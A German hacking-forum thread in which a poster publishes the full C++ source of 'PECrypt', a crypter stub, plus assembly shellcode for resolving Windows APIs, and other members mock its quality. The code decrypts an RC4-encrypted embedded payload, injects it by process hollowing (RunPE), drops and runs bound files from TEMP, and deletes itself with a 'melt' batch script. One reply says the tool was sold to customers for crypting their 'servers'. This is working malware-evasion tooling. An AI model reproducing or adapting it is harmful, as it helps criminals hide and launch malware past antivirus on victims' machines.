PECrypt geht OpenSource

[Cyber Tjak]

Hab keine Verwendung mehr.
Werde langsam mal Source schnipsel posten, ist noch viel unnützer code drin der zu fixen ist (ist alles Debug Style hrhr)

Alles zu lernzwecken.

Hier beginnt die Stub, Cpp:

Code:

#define WIN32_LEAN_AND_MEAN

#include <Windows.h>

UCHAR NTDLLDLL_STR[]                = "NTDLL.DLL";
UCHAR SHELL32_STR[]                 = "SHELL32.DLL";
UCHAR KERNEL32DLL_STR[]                = "KERNEL32.DLL";

UCHAR LSTRCATA_STR[]                = "lstrcatA";
UCHAR HEAPALLOC_STR[]                = "HeapAlloc";
UCHAR WRITEFILE_STR[]               = "WriteFile";
UCHAR EXITPROCESS_STR[]             = "ExitProcess";
UCHAR CLOSEHANDLE_STR[]             = "CloseHandle";
UCHAR CREATEFILE_STR[]              = "CreateFileA";
UCHAR RESUMETHREAD_STR[]            = "ResumeThread";
UCHAR SHELLEXECUTE_STR[]            = "ShellExecuteA";
UCHAR LOCKRESOURCE_STR[]            = "LockResource";
UCHAR LOADRESOURCE_STR[]            = "LoadResource";
UCHAR LOADLIBRARYA_STR[]            = "LoadLibraryA";
UCHAR RTLMOVEMEMORY_STR[]            = "RtlMoveMemory";
UCHAR FINDRESOURCEA_STR[]            = "FindResourceA";
UCHAR SIZEOFRESOURCE_STR[]            = "SizeofResource";
UCHAR GETPROCESSHEAP_STR[]            = "GetProcessHeap";
UCHAR VIRTUALALLOCEX_STR[]            = "VirtualAllocEx";
UCHAR CREATEPROCESSA_STR[]            = "CreateProcessA";
UCHAR GETTHREADCONTEXT_STR[]        = "GetThreadContext";
UCHAR SETTHREADCONTEXT_STR[]        = "SetThreadContext";
UCHAR GETMODULEFILENAMEA_STR[]        = "GetModuleFileNameA";
UCHAR NTWRITEVIRTUALMEMORY_STR[]    = "NtWriteVirtualMemory";
UCHAR NTUNMAPVIEWOFSECTION_STR[]    = "NtUnmapViewOfSection";
UCHAR GETENVIROMENTVARIABLE_STR[]   = "GetEnvironmentVariableA";

UCHAR ALL_ENCRYPTION_KEY_STR[]      = "PECrypt_Encryption_Password_Place_Holder||||||";

UCHAR TEMP_VAR[] = "TEMP";
UCHAR SHELL_CMD[] = "OPEN";
UCHAR BACKSPACE_STR[] = "\\";

UCHAR RESOURCE_NAME[] = "RTDATA";

UCHAR BATCH[] = ".BAT";
UCHAR MELT_BATCH1[] = "@ECHO OFF\r\n:L\r\nDEL \"";
UCHAR MELT_BATCH2[] = "\"\r\nIF EXIST \"";
UCHAR MELT_BATCH3[] = "\" GOTO L\r\nM:\r\nDEL \"";
UCHAR MELT_BATCH4[] = "\"\r\n:M\r\nIF EXIST \"";
UCHAR MELT_BATCH5[] = "\" GOTO M\r\n";

UCHAR API_SHELL[] =
    "\xE8\x01\x00\x00\x00\xC3\x55\x89\xE5\x83\xEC\x24\x89\x45\xDC\x89"
    "\x5D\xE0\x89\x4D\xE4\x31\xC0\x31\xDB\x31\xC9\x64\x8B\x71\x30\x8B"
    "\x76\x0C\x8B\x76\x1C\x8B\x46\x08\x8B\x7E\x20\x8B\x36\x38\x4F\x18"
    "\x75\xF3\x89\x45\xEC\x89\xC6\x03\x70\x3C\x89\x75\xF0\x83\xC6\x78"
    "\x03\x06\x89\x45\xF8\x8B\x5D\xEC\x03\x58\x20\x89\x5D\xF4\x8B\x7D"
    "\xF4\x31\xC9\x8B\x5D\xEC\x03\x1F\x81\x3B\x47\x65\x74\x50\x74\x06"
    "\x83\xC7\x04\x41\xEB\xED\x81\x7B\x04\x72\x6F\x63\x41\x74\x06\x83"
    "\xC7\x04\x41\xEB\xDE\x89\xCF\x8B\x45\xF8\x8B\x5D\xEC\x83\xC0\x24"
    "\x03\x18\xD1\xC1\x01\xCB\x31\xC9\x0F\xB7\x0B\xC1\xC1\x02\x8B\x45"
    "\xF8\x8B\x5D\xEC\x83\xC0\x1C\x03\x18\x01\xCB\x8B\x03\x03\x45\xEC"
    "\x89\x45\xE8\xFF\x75\xE4\xFF\x75\xEC\xFF\x55\xE8\xFF\x75\xDC\xFF"
    "\xD0\xFF\x75\xE0\x50\xFF\x55\xE8\xC9\xC3";

typedef struct _RESSOURCE_STRCT
{
    CHAR*  ReadByte;
    DWORD  ReadByteSize;
} RESSOURCE_STRCT, *PRESSOURCE_STRCT;

typedef LPVOID    (__stdcall* HeapAllocF)(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
typedef DWORD     (__stdcall* ResumeThreadF)(HANDLE hThread);
typedef LPVOID    (__stdcall* LockResourceF)(HGLOBAL hResData);

typedef HANDLE    (__stdcall* GetProcessHeapF)(VOID);
typedef VOID*     (__stdcall* VirtualAllocExF)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef BOOL      (__stdcall* CreateProcessAF)(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);;
typedef VOID      (__stdcall* RtlMoveMemoryF)(VOID UNALIGNED *Destination, CONST VOID UNALIGNED *Source, SIZE_T Length);
typedef HRSRC     (__stdcall* FindResourceAF)(HMODULE hModule, LPCSTR lpName, LPCSTR lpType);
typedef HGLOBAL   (__stdcall* LoadResourceF)(HMODULE hModule,HRSRC hResInfo);
typedef DWORD       (__stdcall* SizeOfResourceF)(HMODULE hModule, HRSRC hResInfo);
typedef BOOL      (__stdcall* GetThreadContextF)(HANDLE hThread, LPCONTEXT lpContext);
typedef BOOL      (__stdcall* SetThreadContextF)(HANDLE hThread, CONST CONTEXT *lpContext);

typedef DWORD     (__stdcall* GetModuleFileNameF)(HMODULE hModule, LPCH lpFilename, DWORD nSize);
typedef BOOL      (__stdcall* NtWriteVirtualMemoryF)(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten);
typedef LONG      (__stdcall* NtUnmapViewOfSectionF)(HANDLE ProcessHandle, PVOID BaseAddress); 

typedef DWORD     (__stdcall* GetEnvironmentVariableAF)(LPCSTR lpName, LPSTR lpBuffer, DWORD nSize);
typedef HINSTANCE (__stdcall* ShellExecuteF)(HWND hwnd, LPCTSTR lpOperation, LPCTSTR lpFile, LPCTSTR lpParameters, LPCTSTR lpDirectory, INT nShowCmd);
typedef HANDLE    (__stdcall* CreateFileF)(LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
typedef BOOL      (__stdcall* WriteFileF)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
typedef BOOL      (__stdcall* CloseHandleF)(HANDLE hObject);

typedef LPSTR     (__stdcall* lstrcatAF)(LPSTR lpString1, LPCSTR lpString2);
typedef VOID      (__stdcall* ExitProcessF)(UINT uExitCode);

lstrcatAF             lstrcatA_;
HeapAllocF            HeapAlloc_;
WriteFileF            WriteFile_;
CreateFileF           CreateFile_;
CloseHandleF          CloseHandle_;
ExitProcessF          ExitProcess_;
ResumeThreadF         ResumeThread_;
LockResourceF          LockResource_;
LoadResourceF          LoadResource_;
ShellExecuteF         ShellExecute_;
RtlMoveMemoryF          RtlMoveMemory_;
FindResourceAF          FindResource_;
SizeOfResourceF          SizeOfResource_;    
GetProcessHeapF       GetProcessHeap_;
VirtualAllocExF       VirtualAllocEx_;
CreateProcessAF       CreateProcessA_;
GetThreadContextF     GetThreadContext_;
SetThreadContextF     SetThreadContext_;
GetModuleFileNameF    GetModuleFileName_;
NtWriteVirtualMemoryF NtWriteVirtualMemory_;
NtUnmapViewOfSectionF NtUnmapViewOfSection_;
GetEnvironmentVariableAF GetEnvironmentVariableA_;

VOID SetupAPI(CONST CHAR* DLLName, CONST CHAR* FunctionName, LPVOID WriteVar);
LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen);
PRESSOURCE_STRCT LoadResourceData(INT INT_RES, CONST CHAR* RS_NAME);
VOID BinderExecute(PRESSOURCE_STRCT ResStruct);
DWORD RunPE(LPBYTE InjectByte);
LPVOID GetAddr(LPVOID String);
VOID MeltFile(VOID);
VOID GetAPIAddr();

INT WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nShowCmd)
{
    PRESSOURCE_STRCT OptionsResStrc = 0;
    PRESSOURCE_STRCT InjectResStrc = 0;
    PRESSOURCE_STRCT BindResStrc = 0;

    GetAPIAddr();

    OptionsResStrc = LoadResourceData(101, (CONST CHAR*)GetAddr(&RESOURCE_NAME));
    
    //OptionsResStrc->ReadByte = (CHAR*)RC4((LPBYTE)OptionsResStrc->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), OptionsResStrc->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);

    InjectResStrc = LoadResourceData(102, (CONST CHAR*)GetAddr(&RESOURCE_NAME));

    BindResStrc   = LoadResourceData(103, (CONST CHAR*)GetAddr(&RESOURCE_NAME));

    if(BindResStrc->ReadByteSize != 0)
    {
        BinderExecute(BindResStrc);
    };

    //InjectResStrc->ReadByte = (CHAR*)RC4((LPBYTE)InjectResStrc->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), InjectResStrc->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);

    RunPE((LPBYTE)InjectResStrc->ReadByte);

    if(OptionsResStrc->ReadByte[0] == '1')
    {
        MeltFile();
    };

    return 0;
};

VOID MeltFile(VOID)
{
    CHAR* MyPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
    GetModuleFileName_(NULL, MyPath, MAX_PATH);
    
    CHAR* NewPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
    GetEnvironmentVariableA_((LPCSTR)GetAddr(&TEMP_VAR), NewPath, MAX_PATH);
    lstrcatA_(NewPath, (CHAR*)GetAddr(&BACKSPACE_STR));

    CHAR* BATCH_DATA = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, 1024);
    lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH1));
    lstrcatA_(BATCH_DATA, MyPath);
    lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH2));
    lstrcatA_(BATCH_DATA, MyPath);
    lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH3));
    lstrcatA_(BATCH_DATA, NewPath);
    lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&RESOURCE_NAME));
    lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&BATCH));
    lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH4));
    lstrcatA_(BATCH_DATA, NewPath);
    lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&RESOURCE_NAME));
    lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&BATCH));
    lstrcatA_(BATCH_DATA, (CHAR*)GetAddr(&MELT_BATCH5));

    lstrcatA_(NewPath, (CHAR*)GetAddr(&RESOURCE_NAME));
    lstrcatA_(NewPath, (CHAR*)GetAddr(&BATCH));

    HANDLE hFile = CreateFile_((LPCSTR)NewPath, GENERIC_WRITE, 0, 0, CREATE_NEW, NULL, NULL);
    DWORD dwWritten = 0;

    DWORD nSize = 0;
    do
    {
        nSize++;
    }
    while(BATCH_DATA[nSize] != '\0');

    WriteFile_(hFile, BATCH_DATA, nSize, &dwWritten, NULL);

    CloseHandle_(hFile);

ShellLoop:
    if((INT)ShellExecute_(NULL, (LPCSTR)GetAddr(&SHELL_CMD), NewPath, NULL, NULL, 0) < 32)
    {
        goto ShellLoop;
    };

    ExitProcess_(ERROR_SUCCESS);

    return;
};

VOID BinderExecute(PRESSOURCE_STRCT ResStruct)
{
    DWORD I = 0;

    for(I = 1; I < ResStruct->ReadByteSize * 2; I++)
    {
        CHAR* TempPath = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
        
        GetEnvironmentVariableA_((LPCSTR)GetAddr(&TEMP_VAR), TempPath, MAX_PATH);

        PRESSOURCE_STRCT BinderStruct = 0;

        BinderStruct = LoadResourceData(103 + I, (CONST CHAR*)GetAddr(&RESOURCE_NAME));

        BinderStruct->ReadByte = (CHAR*)RC4((LPBYTE)BinderStruct->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), BinderStruct->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);

        PRESSOURCE_STRCT BindStruct2 = 0;
        BindStruct2 = LoadResourceData(103 + I + 1, (CONST CHAR*)GetAddr(&RESOURCE_NAME));

        BindStruct2->ReadByte = (CHAR*)RC4((LPBYTE)BindStruct2->ReadByte, (LPBYTE)GetAddr(&ALL_ENCRYPTION_KEY_STR), BindStruct2->ReadByteSize, sizeof(ALL_ENCRYPTION_KEY_STR) - 1);

        lstrcatA_(TempPath, (CHAR*)GetAddr(BACKSPACE_STR));
        lstrcatA_(TempPath, BindStruct2->ReadByte);

        HANDLE hFile = CreateFile_((LPCSTR)TempPath, GENERIC_WRITE, 0, 0, CREATE_NEW, NULL, NULL);

        DWORD dwWritten = 0;
        WriteFile_(hFile, BinderStruct->ReadByte, BinderStruct->ReadByteSize, &dwWritten, NULL);

        CloseHandle_(hFile);

        ShellExecute_(NULL, (LPCSTR)GetAddr(&SHELL_CMD), TempPath, NULL, NULL, 5);

        I++;
    };

    return;
};

LPVOID GetAddr(LPVOID String)
{
    LPVOID RTChar = 0;

    _asm CALL DELTA

DELTA:
    _asm POP EBX
    _asm SUB EBX, OFFSET DELTA
    _asm MOV ESI, String
    _asm LEA EAX, [EBX + ESI]
    _asm MOV RTChar, EAX

    return RTChar;
};

PRESSOURCE_STRCT LoadResourceData(INT INT_RES, CONST CHAR* RS_NAME)
{
    HRSRC hRsrc = 0;
    CHAR* lpFile = 0;
    HGLOBAL hGlob = 0;
    DWORD dwFileSize = 0;
    PRESSOURCE_STRCT uResStrt;

    uResStrt = (PRESSOURCE_STRCT)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(RESSOURCE_STRCT));

    hRsrc = FindResource_(NULL, MAKEINTRESOURCE(INT_RES), RS_NAME);    
    dwFileSize = SizeOfResource_(NULL, hRsrc);
    hGlob = LoadResource_(NULL, hRsrc);
    lpFile = (CHAR*)LockResource_(hGlob);
    uResStrt->ReadByte = (CHAR*)HeapAlloc_(GetProcessHeap_(), NULL, dwFileSize);
    RtlMoveMemory_(uResStrt->ReadByte, lpFile, dwFileSize);
    uResStrt->ReadByte[dwFileSize] = '\0';

    uResStrt->ReadByteSize = dwFileSize;

    return uResStrt;
};

LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen)
{
    INT A = 0, B = 0, S[256];
    BYTE Swap;
    DWORD dwCount;

    for(A = 0; A < 256; A++)
    {
        S[A] = A;
    };

    for(A = 0; A < 256; A++)
    {
        B = (B + S[A] + lpKey[A % dwKeyLen]) % 256;
        Swap = S[A];
        S[A] = S[B];
        S[B] = Swap;
    };

    A = 0;
    B = 0;

    for(dwCount = 0; dwCount < dwBufLen; dwCount++)
    {
        A = (A + 1) % 256;
        B = (B + S[A]) % 256;
        Swap = S[A];
        S[A] = S[B];
        S[B] = Swap;
        lpBuf[dwCount] ^= S[(S[A] + S[B]) % 256];
    };

    return lpBuf;
};

VOID SetupAPI(CONST CHAR* DLLName, CONST CHAR* FunctionName, LPVOID WriteVar)
{
    DWORD AddressOfAPI_Shell = (DWORD)GetAddr(API_SHELL);
    CHAR* LoadLibStr = (CHAR*)GetAddr(LOADLIBRARYA_STR);
    LPVOID vVAR = GetAddr(WriteVar);

    _asm PUSHAD
    _asm MOV EAX, DLLName
    _asm MOV EBX, FunctionName
    _asm MOV ECX, LoadLibStr
    _asm CALL AddressOfAPI_Shell

    _asm MOV EDI, vVAR
    _asm MOV [EDI], EAX

    return;
};


DWORD RunPE(LPBYTE InjectByte)
{
    LONG                  I = 0;
    CHAR*                 HostFile = 0;
    CONTEXT*              tCONTEXT = 0;
    STARTUPINFO*          tSTARTUPINFO = 0;
    IMAGE_DOS_HEADER*     tIMAGE_DOS_HEADER = 0;
    IMAGE_NT_HEADERS*     tIMAGE_NT_HEADERS = 0;
    PROCESS_INFORMATION*  tPROCESS_INFORMATION = 0;
    IMAGE_SECTION_HEADER* tIMAGE_SECTION_HEADER = 0;

    HostFile = (CHAR*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, MAX_PATH);
    tCONTEXT = (CONTEXT*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(CONTEXT));
    tSTARTUPINFO = (STARTUPINFO*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(STARTUPINFO));
    tIMAGE_DOS_HEADER = (IMAGE_DOS_HEADER*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_DOS_HEADER));
    tIMAGE_NT_HEADERS = (IMAGE_NT_HEADERS*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_NT_HEADERS));
    tPROCESS_INFORMATION = (PROCESS_INFORMATION*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(PROCESS_INFORMATION));
    tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_SECTION_HEADER)); 

    tCONTEXT->ContextFlags = CONTEXT_FULL;
    tSTARTUPINFO->cb = sizeof(STARTUPINFO);
    GetModuleFileName_(NULL, HostFile, MAX_PATH);

    tIMAGE_DOS_HEADER = (IMAGE_DOS_HEADER*)&InjectByte[0];
    tIMAGE_NT_HEADERS = (IMAGE_NT_HEADERS*)&InjectByte[tIMAGE_DOS_HEADER->e_lfanew];

    if(CreateProcessA_(HostFile, NULL, NULL, NULL, NULL, CREATE_SUSPENDED, NULL, NULL, tSTARTUPINFO, tPROCESS_INFORMATION))
    {
        NtUnmapViewOfSection_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase); 
        VirtualAllocEx_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase, tIMAGE_NT_HEADERS->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, (LPVOID)tIMAGE_NT_HEADERS->OptionalHeader.ImageBase, &InjectByte[0], tIMAGE_NT_HEADERS->OptionalHeader.SizeOfHeaders, NULL);

        for(I = 0; I < tIMAGE_NT_HEADERS->FileHeader.NumberOfSections; I++)
        {
            tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)HeapAlloc_(GetProcessHeap_(), HEAP_ZERO_MEMORY, sizeof(IMAGE_SECTION_HEADER)); 
            tIMAGE_SECTION_HEADER = (IMAGE_SECTION_HEADER*)&InjectByte[tIMAGE_DOS_HEADER->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * I]; 
            NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, (LPVOID)(tIMAGE_NT_HEADERS->OptionalHeader.ImageBase + tIMAGE_SECTION_HEADER->VirtualAddress), &InjectByte[tIMAGE_SECTION_HEADER->PointerToRawData], tIMAGE_SECTION_HEADER->SizeOfRawData, NULL);
        }; 

        GetThreadContext_(tPROCESS_INFORMATION->hThread, tCONTEXT);
        DWORD eImage = tIMAGE_NT_HEADERS->OptionalHeader.ImageBase;
        DWORD eEntry = tIMAGE_NT_HEADERS->OptionalHeader.AddressOfEntryPoint;

        NtWriteVirtualMemory_(tPROCESS_INFORMATION->hProcess, &eEntry, HeapAlloc_(GetProcessHeap_(), NULL, sizeof(DWORD)), sizeof(DWORD), NULL);

        _asm MOV EAX, eImage
        _asm ADD EAX, eEntry
        
        DWORD eEAX = 0;
        _asm MOV eEAX, EAX

        tCONTEXT->Eax = eEAX;
        
        SetThreadContext_(tPROCESS_INFORMATION->hThread, tCONTEXT);
        ResumeThread_(tPROCESS_INFORMATION->hThread);

        return tPROCESS_INFORMATION->dwProcessId;
    };

    return 0;
};

VOID GetAPIAddr()
{
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LSTRCATA_STR), &lstrcatA_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&HEAPALLOC_STR), &HeapAlloc_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&WRITEFILE_STR), &WriteFile_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CREATEFILE_STR), &CreateFile_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CLOSEHANDLE_STR), &CloseHandle_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&EXITPROCESS_STR), &ExitProcess_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LOADRESOURCE_STR), &LoadResource_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&RESUMETHREAD_STR), &ResumeThread_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&LOCKRESOURCE_STR), &LockResource_);
    SetupAPI((CONST CHAR*)GetAddr(&SHELL32_STR    ), (CONST CHAR*)GetAddr(&SHELLEXECUTE_STR), &ShellExecute_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&RTLMOVEMEMORY_STR), &RtlMoveMemory_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&FINDRESOURCEA_STR), &FindResource_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&SIZEOFRESOURCE_STR), &SizeOfResource_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETPROCESSHEAP_STR), &GetProcessHeap_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&VIRTUALALLOCEX_STR), &VirtualAllocEx_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&CREATEPROCESSA_STR), &CreateProcessA_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETTHREADCONTEXT_STR), &GetThreadContext_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&SETTHREADCONTEXT_STR), &SetThreadContext_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETMODULEFILENAMEA_STR), &GetModuleFileName_);
    SetupAPI((CONST CHAR*)GetAddr(&NTDLLDLL_STR   ), (CONST CHAR*)GetAddr(&NTWRITEVIRTUALMEMORY_STR), &NtWriteVirtualMemory_);
    SetupAPI((CONST CHAR*)GetAddr(&NTDLLDLL_STR   ), (CONST CHAR*)GetAddr(&NTUNMAPVIEWOFSECTION_STR), &NtUnmapViewOfSection_);
    SetupAPI((CONST CHAR*)GetAddr(&KERNEL32DLL_STR), (CONST CHAR*)GetAddr(&GETENVIROMENTVARIABLE_STR), &GetEnvironmentVariableA_);

    return;
};

Hier das Api Shell (Asm), vermutlich die Ursache für die x64 Bugs:

Code:

;SetupAPI Shell
;GetProcAddress & LoadLibraryA-Replacement
;
;Usage:
;EAX = Pointer to DLL-Name
;EBX = Pointer to Function-Name
;ECX = Pointer to "LoadLibraryA" (String)
;
include "H:\FASM\INCLUDE\WIN32AX.INC"

USE32

CALL ShellCode
RET

proc ShellCode

locals
    DLLName  DD ?
    FunctionName DD ?
    LoadLibraryA DD ?
    ListGPA  DD ?
    mzKernel DD ?
    peKernel DD ?
    anKernel DD ?
    etKernel DD ?
    ProcAddr DD ?
endl

ShellBegin:
MOV [DLLName], EAX
MOV [FunctionName], EBX
MOV [LoadLibraryA], ECX

XOR EAX, EAX
XOR EBX, EBX

XOR ECX, ECX
MOV ESI, DWORD[FS:ECX+30h]
MOV ESI, DWORD[ESI+0Ch]
MOV ESI, DWORD[ESI+1Ch]

KernelMark:
MOV EAX, DWORD[ESI+8]
MOV EDI, DWORD[ESI+20h]
MOV ESI, DWORD[ESI]
CMP BYTE[EDI+18h], CL
JNE KernelMark

MOV [mzKernel], EAX
MOV ESI, EAX
ADD ESI, DWORD[EAX+0x3C]
MOV [peKernel], ESI
ADD ESI, 0x78
ADD EAX, DWORD[ESI]
MOV [etKernel], EAX
MOV EBX, [mzKernel]
ADD EBX, DWORD[EAX+0x20]
MOV [anKernel], EBX
MOV EDI, [anKernel]
XOR ECX, ECX

LIST_GPA:
MOV EBX, [mzKernel]
ADD EBX, DWORD[EDI]

CMP DWORD[EBX], 'GetP'
JE GOT_PROC1
ADD EDI, 4
INC ECX
JMP LIST_GPA

GOT_PROC1:
CMP DWORD[EBX+4], 'rocA'
JE GOT_PROC2
ADD EDI, 4
INC ECX
JMP LIST_GPA

GOT_PROC2:
MOV EDI, ECX
MOV EAX, DWORD[etKernel]
MOV EBX, DWORD[mzKernel]
ADD EAX, 0x24
ADD EBX, DWORD[EAX]
ROL ECX, 1
ADD EBX, ECX
XOR ECX, ECX
MOVZX ECX, WORD[EBX]
ROL ECX, 2
MOV EAX, DWORD[etKernel]
MOV EBX, DWORD[mzKernel]
ADD EAX, 0x1C
ADD EBX, DWORD[EAX]
ADD EBX, ECX
MOV EAX, DWORD[EBX]
ADD EAX, DWORD[mzKernel]
MOV[ListGPA], EAX

PUSH [LoadLibraryA]
PUSH DWORD[mzKernel]
CALL DWORD[ListGPA]

PUSH [DLLName]
CALL EAX

PUSH [FunctionName]
PUSH EAX
CALL DWORD[ListGPA]
LEAVE
RET

endp

Und hier das in MASM kompilierbare Dump woraus ich den Shellcode erstellt habe (von mir, Tjak, gekürzt, weil der Text zu lang wäre):

Code:

http://nopaste.free-hack.com/index.php?id=b4504e9c86

Viel Spaß hrhr

Credits gehen noch an e0n (hackhound) hatte mal ne vorlage für das Api Shell genutzt.
Rest ist 100% selfcoded.

Hoffe ihr schätzt meine Arbeit hrhr^^

Quelle: M4x Maximus aka Cyberterrorist M4x (Coder) von HBA-Crew - Thread-Link

[wacked]

Credits gehen noch an e0n (hackhound) hatte mal ne vorlage für das Api Shell genutzt.
Rest ist 100% selfcoded.

Cryptic Mod.

Der Binder ist ja wohl ganz grausam. Außerdem wäre dort CreateProcess() angebrachter als ShellExecute().
Was die LPVOID GetAddr(LPVOID String) funktion soll ist mir absolut schleierhaft.

Dann kennt der Coder noch nicht einmal strlen. Oder gibt es einen Grund für das hier?

Code:

DWORD nSize = 0;
do     {         nSize++;     }     while(BATCH_DATA[nSize] != '\0');
WriteFile_(hFile, BATCH_DATA, nSize, &dwWritten, NULL);

Und auch while gehört anscheinend nicht zum Kentnissstand des Coders

Code:

ShellLoop:     
if((INT)ShellExecute_(NULL, (LPCSTR)GetAddr(&SHELL_CMD), NewPath, NULL, NULL, 0) < 32) 
    {
 goto ShellLoop;
};

(Was das Semikolon da soll weiß ich auch nicht.)

In LoadResourceData wird außerdem noch memory alloziert und nicht wieder freigegeben.

[Bozok]

Schlecht... Sehe eig nicht was so ultramegapolymeta dran ist.
Die Shellcode implementierung ist einfach nur schlecht, er hätte gleich alles in shellcode umschreiben können...

Naja M4x labert halt viel wenn der Tag lang ist.

[n0ise]

Sagte ich doch immer dass der nix drauf hat und nur Scheisse labert.
Sieht man ja jetzt an seinem schrottigen Source.

[K-Gee]

Server war wohl deshalb nach dem Crypten oft unstable :O, schade wegen den kunden... das geld zu investieren in so nen Schei*e lohnt sich nicht (nimms nicht persönlich Tjak)